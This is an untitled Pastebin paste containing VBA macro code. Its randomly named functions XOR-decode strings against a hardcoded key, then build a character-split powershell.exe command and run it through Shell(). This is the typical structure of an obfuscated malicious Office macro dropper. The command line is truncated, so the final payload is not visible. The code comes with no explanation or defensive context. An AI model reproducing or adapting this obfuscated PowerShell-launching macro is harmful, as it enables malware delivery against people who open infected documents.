Advertisement
Guest User

Untitled

a guest
Jul 10th, 2018
69
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. Function uzxr(str As String) As Variant: Dim bytes() As Byte: bytes = str: uzxr = bytes: End Function
  2. Function pyag(bytes() As Byte) As String: Dim str As String: str = bytes: pyag = str: End Function
  3.  
  4. Function v5ut6ikj(str As String) As String
  5.     Const p_ As String = "grtreqzy"
  6.     Dim sb_() As Byte, pb_() As Byte
  7.     sb_ = uzxr(str)
  8.     pb_ = uzxr(p_)
  9.  
  10.     Dim uL As Long
  11.     uL = UBound(sb_)
  12.  
  13.     ReDim scb_(0 To uL) As Byte
  14.  
  15.     Dim idx As Long
  16.  
  17.     For idx = LBound(sb_) To uL:
  18.         If Not sb_(idx) = 0 Then
  19.             c = sb_(idx)
  20.             For i = 0 To UBound(pb_):
  21.                 c = c Xor pb_(i)
  22.             Next i
  23.             scb_(idx) = c
  24.         End If
  25.  
  26.     Next idx
  27.  
  28.     v5ut6ikj = pyag(scb_)
  29. End Function
  30.  
  31.  
  32. Dim ptuimlka As String
  33. ptuimlka = "powershell.exe v5ut6ikj(chr(38) & "" & "M" & "" & chr(65) & "\" & "" & "$" & "" & chr(44) &$
  34. Shell (ptuimlka)
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement